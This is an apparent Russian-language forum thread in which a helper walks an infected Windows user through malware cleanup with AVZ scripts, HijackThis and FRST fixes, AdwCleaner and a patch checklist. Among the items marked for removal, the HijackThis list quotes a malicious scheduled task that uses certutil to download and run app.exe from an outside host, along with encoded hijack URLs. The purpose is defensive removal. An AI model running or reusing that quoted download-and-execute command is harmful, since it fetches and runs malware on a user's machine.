Здравствуйте, нахватал всего, чего только можно.

Нахватали.



Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО (http://safezone.cc/forum/showthread.php?t=18577).

Выполните скрипт в АВЗ (http://forum.oszone.net/post-1430637-4.html) (Файл - Выполнить скрипт):


begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
SetServiceStart('Nettrans', 4);
SetServiceStart('TCPSvc', 4);
SetServiceStart('Voyasollam', 4);
SetServiceStart('WinDefender', 4);
QuarantineFileF('c:\windows\rss\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
QuarantineFile('C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE', '');
QuarantineFile('C:\Program Files (x86)\DayByDay\6787991.exe', '');
QuarantineFile('C:\Program Files (x86)\EPVqpVJyVSWU2\kLdzDpguWOneJ.dll', '');
QuarantineFile('C:\Program Files (x86)\JAcqddADqIE\g66RRRr.dll', '');
QuarantineFile('C:\Program Files (x86)\JAcqddADqIE\k8O3geHP3.dll', '');
QuarantineFile('c:\program files (x86)\jacqddadqie\qssvqsgsqj.exe', '');
QuarantineFile('C:\Program Files (x86)\KCGHGVOnU\LzpuOe.dll', '');
QuarantineFile('C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\zrFuZkI.dll', '');
QuarantineFile('C:\Program Files\TTK0EM7F5D\TTK0EM7F5.exe', '');
QuarantineFile('C:\ProgramData\PrefsSecure\Nettrans.exe', '');
QuarantineFile('C:\ProgramData\Voyasollam\Voyasollam.exe', '');
QuarantineFile('c:\users\777\appdata\local\temp\csrss\cloudnet.exe', '');
QuarantineFile('c:\users\777\appdata\local\temp\csrss\proxy\tor\tor.exe', '');
QuarantineFile('C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe', '');
QuarantineFile('C:\Users\777\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe', '');
QuarantineFile('C:\Users\777\AppData\Roaming\zcjri\ozsnk.vbs', '');
QuarantineFile('c:\windows\rss\csrss.exe', '');
QuarantineFile('c:\windows\windefender.exe', '');
DeleteFile('C:\Program Files (x86)\DayByDay\6787991.exe', '32');
DeleteFile('C:\Program Files (x86)\EPVqpVJyVSWU2\kLdzDpguWOneJ.dll', '32');
DeleteFile('C:\Program Files (x86)\JAcqddADqIE\g66RRRr.dll', '32');
DeleteFile('C:\Program Files (x86)\JAcqddADqIE\k8O3geHP3.dll', '32');
DeleteFile('c:\program files (x86)\jacqddadqie\qssvqsgsqj.exe', '32');
DeleteFile('C:\Program Files (x86)\KCGHGVOnU\LzpuOe.dll', '32');
DeleteFile('C:\Program Files (x86)\SvnSzzIscGyUC\WTJfUEt.dll', '32');
DeleteFile('C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\zrFuZkI.dll', '32');
DeleteFile('C:\Program Files\TTK0EM7F5D\TTK0EM7F5.exe', '32');
DeleteFile('C:\ProgramData\PrefsSecure\Nettrans.exe', '32');
DeleteFile('C:\ProgramData\Voyasollam\Voyasollam.exe', '32');
DeleteFile('c:\users\777\appdata\local\temp\csrss\cloudnet.exe', '32');
DeleteFile('C:\Users\777\AppData\Local\Temp\csrss\proxy\Tor\tor.exe', '32');
DeleteFile('C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe', '32');
DeleteFile('C:\Users\777\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe', '32');
DeleteFile('C:\Users\777\AppData\Roaming\vqwqrlmiera\cw5fttprixn.exe', '32');
DeleteFile('C:\Users\777\AppData\Roaming\zcjri\ozsnk.vbs', '32');
DeleteFile('C:\Windows\rss\csrss.exe', '32');
DeleteFile('C:\Windows\system32\Tasks\csrss', '64');
DeleteFile('C:\Windows\system32\Tasks\jbDyCmJOWCzWzi', '64');
DeleteFile('C:\Windows\system32\Tasks\ozsnk', '64');
DeleteFile('C:\Windows\system32\Tasks\RuvZlWnxKNkmGuM2', '64');
DeleteFile('C:\Windows\system32\Tasks\ScheduledUpdate', '64');
DeleteFile('C:\Windows\system32\Tasks\TUZwhpCbnzWcBoUhWSI2', '64');
DeleteFile('C:\Windows\system32\Tasks\wAJDAAZgOBCdyQgsK2', '64');
DeleteFile('C:\Windows\windefender.exe', '32');
DeleteFile('C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE','32');
DeleteFile('C:\Windows\system32\Tasks\FastDataX Task','64');
DeleteService('Nettrans');
DeleteService('TCPSvc');
DeleteService('Voyasollam');
DelBHO('{C0D38E5A-7CF8-4105-8FE8-31B81443A114}');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '7293625');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CloudNet');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CrimsonMorning');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'NEDLMC32E48914Z');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\RunOnce', 'ez1jxpzcudr');
ExecuteRepair(3);
ExecuteRepair(4);
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.


Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы (http://www.oszone.net/virusnet/) или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (http://forum.oszone.net/post-1430293-2.html) (некоторые строки могут отсутствовать):

R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORI h78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORI h78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORI h78ebsLAAvJbMPDcCHlsMMN8buNs4WWWYFmbtFw5E-x4MJ55Km8rKJhp3gmj53LLZLtFsZuczC9ErBFJ2m5sYQKXbeFCM4IXKS7t1
R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORI h78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6
R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORI h78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6uAMt9CelOLZKhng,,&q={searchTerms}
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch} [URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORI h78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6uAMt9CelOLZKhng,,&q={searchTerms} - Search the web
O2-32 - HKLM\..\BHO: (no name) - {2e32cfe5-df92-4ae5-b0be-609ed0df74a6} - (no file)
O3 - HKLM\..\Toolbar: (no name) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - (no file)
O4 - HKCU\..\Run: [NEDLMC32E48914Z] = C:\Program Files\TTK0EM7F5D\TTK0EM7F5.exe
O4 - HKLM\..\RunOnce: [ez1jxpzcudr] = C:\Program Files (x86)\DayByDay\6787991.exe 1 3.1526897736.5b029c48bfeb0
O22 - Task: ScheduledUpdate - C:\Windows\system32\cmd.exe /C certutil.exe -urlcache -split -f http://dp.fastandcoolest.com/app/3/app.exe C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe /31340
O22 - Task: SidebarExecute - C:\Program Files\Windows Sidebar\sidebar.exe "C:\Users\777\AppData\Local\Opera\Opera\temporary_downloads\autoshutdown_sevengadgets.ru.zip"
O22 - Task: jbDyCmJOWCzWzi - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\EPVqpVJyVSWU2\kLdzDpguWOneJ.dll",#1
O22 - Task: ozsnk - C:\Users\777\AppData\Roaming\zcjri\ozsnk.vbs
O22 - Task: wAJDAAZgOBCdyQgsK2 - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\zrFuZkI.dll",#1


- Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK (https://safezone.cc/resources/102/). Отчёт о работе прикрепите.





Скачайте AdwCleaner (https://toolslib.net/downloads/viewdownload/1-adwcleaner/) и сохраните его на Рабочем столе.
Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[S0].txt.
Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве (https://safezone.cc/threads/22250).

Архив отправить не получилось, через почту блокирует отправку из-за вируса. По форме не получится, т.к. 15мб архив.

Да и что-то мне подсказывает, это лишним не будет

Не будет лишним

Запустите повторно AdwCleaner (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать"), а по окончании сканирования нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления.
Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt.
Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

Подробнее читайте в этом руководстве (https://safezone.cc/threads/22250/#post-157088).


Скачайте Farbar Recovery Scan Tool (http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве ('https://safezone.cc/threads/17759/').

Вот

Chrome необходимо переустановить.


Отключите до перезагрузки антивирус.
Выделите следующий код:
Start::
CreateRestorePoint:
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: F - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {0361f8c8-1feb-11e5-8a44-bc5ff45bf5bc} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {35e670e4-04f5-11e3-bf2e-d48124610c42} - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {370ffd16-23ba-11e5-b674-bc5ff45bf5bc} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {3f97ed44-355d-11e5-b717-bc5ff45bf5bc} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {3f97ed8a-355d-11e5-b717-bc5ff45bf5bc} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {5e6d0f4d-4c4b-11e2-8b21-806e6f6e6963} - E:\ASRSetup.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {7230e32a-0655-11e3-b66a-890f3d003943} - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {75572a7a-1239-11e4-ae9a-bc5ff45bf5bc} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {75572ac9-1239-11e4-ae9a-bc5ff45bf5bc} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {8579e798-4d3f-11e3-87d6-e98517bf4342} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {85d94462-4b91-11e3-8663-863797962743} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {901f47c5-5804-11e4-86b7-bc5ff45bf5bc} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {b103756a-3835-11e5-8ad7-bc5ff45bf5bc} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {b59d5b41-2251-11e5-b64e-bc5ff45bf5bc} - F:\AutoRun.exe
HKU\S-1-5-21-3106669818-2837810392-2497721357-1000\...\MountPoints2: {d9776601-0575-11e3-b3d2-d5a01e20a042} - H:\HTC_Sync_Manager_PC.exe
AppInit_DLLs: C:\ProgramData\Voyasollam\InchDom.dll => No File
AppInit_DLLs-x32: C:\ProgramData\Voyasollam\Lexiity.dll => No File
ShellExecuteHooks: No Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\system32\mcicda64.dll -> No File
CHR res: Infected resources.pak (Adware script). Reinstall Chrome. <==== ATTENTION
2018-05-21 15:12 - 2018-05-21 21:03 - 000000000 ____D C:\Users\777\AppData\Roaming\vqwqrlmiera
2018-05-21 15:12 - 2018-05-21 21:03 - 000000000 ____D C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR
2018-05-21 15:12 - 2018-05-21 21:03 - 000000000 ____D C:\Program Files (x86)\SvnSzzIscGyUC
2018-05-21 15:12 - 2018-05-21 21:03 - 000000000 ____D C:\Program Files (x86)\KCGHGVOnU
2018-05-21 15:12 - 2018-05-21 21:03 - 000000000 ____D C:\Program Files (x86)\JAcqddADqIE
2018-05-21 15:12 - 2018-05-21 21:03 - 000000000 ____D C:\Program Files (x86)\EPVqpVJyVSWU2
2018-05-21 15:12 - 2018-05-21 15:12 - 000000000 ____D C:\Program Files\TTK0EM7F5D
2018-05-21 14:13 - 2018-05-21 14:13 - 000000000 ____D C:\Users\777\AppData\Roaming\zcjri
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll -> No File
ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
Task: {003318BF-2846-4AD7-A91C-1C812D263F69} - \ozsnk -> No File <==== ATTENTION
Task: {2E58F6A5-3E22-4A55-83FE-1659A172FAC0} - \jbDyCmJOWCzWzi -> No File <==== ATTENTION
Task: {3335F6CF-9FB4-4D38-9E19-AF8399CCAEB7} - \wAJDAAZgOBCdyQgsK2 -> No File <==== ATTENTION
Task: {522810DE-966F-4FF9-ADE6-B091B1F0F52D} - \csrss -> No File <==== ATTENTION
Task: {7491A4E6-BA54-457B-97AB-0811549924D5} - \RuvZlWnxKNkmGuM2 -> No File <==== ATTENTION
Task: {C73FFBD5-FF25-45CA-B3FD-DDCDD3B2DC16} - \TUZwhpCbnzWcBoUhWSI2 -> No File <==== ATTENTION
AlternateDataStreams: C:\Program Files\Common Files\System:A6bvtkbhjqDzMMRGzL [2222]
AlternateDataStreams: C:\Users\777\Cookies:gPLpJ5iIwhDIJ7cYRiRCz [2278]
AlternateDataStreams: C:\Users\777\Documents:{2C848322-7882-41E2-AFF6-B060B946FEE9}3 [26]
AlternateDataStreams: C:\Users\777\Мои документы:{2C848322-7882-41E2-AFF6-B060B946FEE9}3 [26]
AlternateDataStreams: C:\ProgramData\Microsoft:00dlLJhienE3xrIzT2WdmKd [2360]
AlternateDataStreams: C:\ProgramData\Microsoft:2gceTMcuk2iDZAo0wgSe95GS [2168]
AlternateDataStreams: C:\ProgramData\TEMP:24C8262A [121]
AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [116]
AlternateDataStreams: C:\ProgramData\TEMP:5B975772 [135]
AlternateDataStreams: C:\ProgramData\TEMP:DDF13E9F [122]
AlternateDataStreams: C:\Users\Public\AppData:CSM [478]
AlternateDataStreams: C:\Users\Все пользователи\Microsoft:00dlLJhienE3xrIzT2WdmKd [2360]
AlternateDataStreams: C:\Users\Все пользователи\Microsoft:2gceTMcuk2iDZAo0wgSe95GS [2168]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:24C8262A [121]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:56E2E879 [116]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:5B975772 [135]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:DDF13E9F [122]
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве ('http://safezone.cc/threads/17760/').

Компьютер почему-то стал с таким окном запускаться еще.

Компьютер почему-то стал с таким окном запускаться еще. »
Это тоже допустимо для Win7. Что с проблемами?

В принципе, вроде больше ничего не осталось.

Подготовьте лог лог SecurityCheck by glax24 (http://safezone.cc/threads/kak-podgotovit-log-securitycheck-by-glax24.19945/)

Ознакомьтесь: Рекомендации после лечения (http://safezone.cc/threads/rekomendacii-posle-udalenija-vredonosnogo-po.16715/)


Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
Запустите AVZ.
Выполните обновление баз (Меню Файл - Обновление баз)
Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
Закачайте полученный архив, как описано на этой странице (http://avz.safezone.cc/).
Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost (http://rgho.st/), Zippyshare (http://www.zippyshare.com/), My-Files.RU (http://my-files.ru/), karelia.ru (http://file.karelia.ru/), Ge.tt (http://www.ge.tt/) или WebFile (http://webfile.ru/)) и укажите ссылку на скачивание в своём следующем сообщении.

Архив отправил.

по возможности исправьте:
------------------------------- [ Windows ] -------------------------------
Internet Explorer 10.0.9200.17377 Внимание! Скачать обновления (http://windows.microsoft.com/ru-ru/internet-explorer/ie-11-worldwide-languages)
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-013.aspx)
HotFix KB3140735 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-026.aspx)
HotFix KB3138910 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-027.aspx)
HotFix KB3138962 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-027.aspx)
HotFix KB3145739 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-039.aspx)
HotFix KB3146963 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-040.aspx)
HotFix KB3156013 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-055.aspx)
HotFix KB3156016 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-055.aspx)
HotFix KB3156019 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-055.aspx)
HotFix KB3155178 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-056.aspx)
HotFix KB3153171 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-061.aspx)
HotFix KB3170455 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-087.aspx)
HotFix KB3178034 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-097.aspx)
HotFix KB3185911 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-106.aspx)
HotFix KB3184122 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-116.aspx)
HotFix KB3192391 Внимание! Скачать обновления (https://technet.microsoft.com/en-us/library/security/ms16-122.aspx)
HotFix KB3197867 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3197867)
HotFix KB3205394 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3205394)
HotFix KB4012212 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212)
HotFix KB4019263 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4019263)
HotFix KB4022722 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4022722)
HotFix KB4015546 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4015546)
HotFix KB4025337 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4025337)
HotFix KB4034679 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4034679)
HotFix KB4041678 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4041678)
HotFix KB4056894 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056894)
HotFix KB4056897 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056897)
HotFix KB4074587 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4074587)
HotFix KB4103712 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4103712)
--------------------------- [ OtherUtilities ] ----------------------------
7-Zip 15.14 (x64) v.15.14 Внимание! Скачать обновления (https://www.7-zip.org/download.html)
^Удалите старую версию, скачайте и установите новую.^
WinRar v.3.93 x64 Внимание! Скачать обновления (https://www.rarlab.com/download.htm)
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 131 (64-bit) v.8.0.1310.11 Внимание! Скачать обновления (http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html)
^Удалите старую версию и установите новую (jre-8u172-windows-x64.exe)^
--------------------------- [ AppleProduction ] ---------------------------
QuickTime v.7.73.80.64 Данная программа больше не поддерживается разработчиком и имеет известные проблемы безопасности! Рекомендуется деинсталлировать (https://support.apple.com/ru-ru/HT205771) данное ПО.
--------------------------- [ AdobeProduction ] ---------------------------
Adobe AIR v.3.6.0.6090 Внимание! Скачать обновления (https://get.adobe.com/ru/air/)
------------------------------- [ Browser ] -------------------------------
Google Chrome v.5.0.375.99 Внимание! Скачать обновления (https://www.google.ru/chrome/browser/desktop/index.html)
^Проверьте обновления через меню Справка - О Google Chrome!^
Mozilla Firefox 56.0 (x86 ru) v.56.0 Внимание! Скачать обновления (https://www.mozilla.org/ru/firefox/all/)
^Проверьте обновления через меню Справка - О Firefox!^
---------------------------- [ UnwantedApps ] -----------------------------
Unity Web Player Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
----------------------------- [ End of Log ] ------------------------------